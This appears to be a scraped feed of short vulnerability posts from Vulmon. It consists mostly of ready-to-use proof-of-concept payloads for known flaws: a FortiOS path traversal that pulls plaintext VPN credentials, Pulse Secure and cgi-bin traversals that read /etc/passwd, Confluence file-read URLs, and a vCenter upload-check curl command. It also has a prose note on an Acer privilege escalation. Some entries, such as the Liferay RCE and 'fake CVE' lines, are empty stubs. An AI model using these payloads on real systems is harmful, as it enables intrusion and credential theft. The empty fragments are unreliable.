Recent Vulmon Research Posts

Acer ships most of the laptops it sells with a software suite called Care Center Service installed. In versions up to and including 4.00.3034, one of the suite's programs is an executable named ListCheck.exe, which runs at logon with the highest privilege available and suffers from a phantom DLL hijacking. This can lead to a privilege escalation when an administrator logs in. Blogpost: https://aptw.tf/2022/01/20/acer-care-center-privesc.html

Fortinet FortiOS path traversal, retrieving plaintext credentials: https://localhost/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

Getting passwd content with the Pulse Secure unauthenticated path traversal: https://localhost/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

If you have permission to modify the configuration file, then you already own the machine. How can it be a vulnerability?

POC of Liferay Portal RCE:

A fake CVE. Source:

VMware vCenter Server file upload vulnerability POC. If the command below responds with anything other than 404, the application is vulnerable: curl -X POST "http://HOST:PORT/analytics/telemetry/ph/api/hyper/send?_c&_i=test" -d "Test_Workaround" -H "Content-Type: application/json" -v 2>&1 | grep HTTP

POCs for Atlassian Confluence Server Arbitrary File Read:
1) http://127.0.0.1/s/123cfx/_/;/WEB-INF/web.xml
2) http://127.0.0.1/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
3) http://127.0.0.1/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
4) http://127.0.0.1/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
https://github.com/ColdFusionX/CVE-2021-26085

PoC: 127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Fortinet FortiWeb OS Command Injection PoC. The patch will be released at the end of August: https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/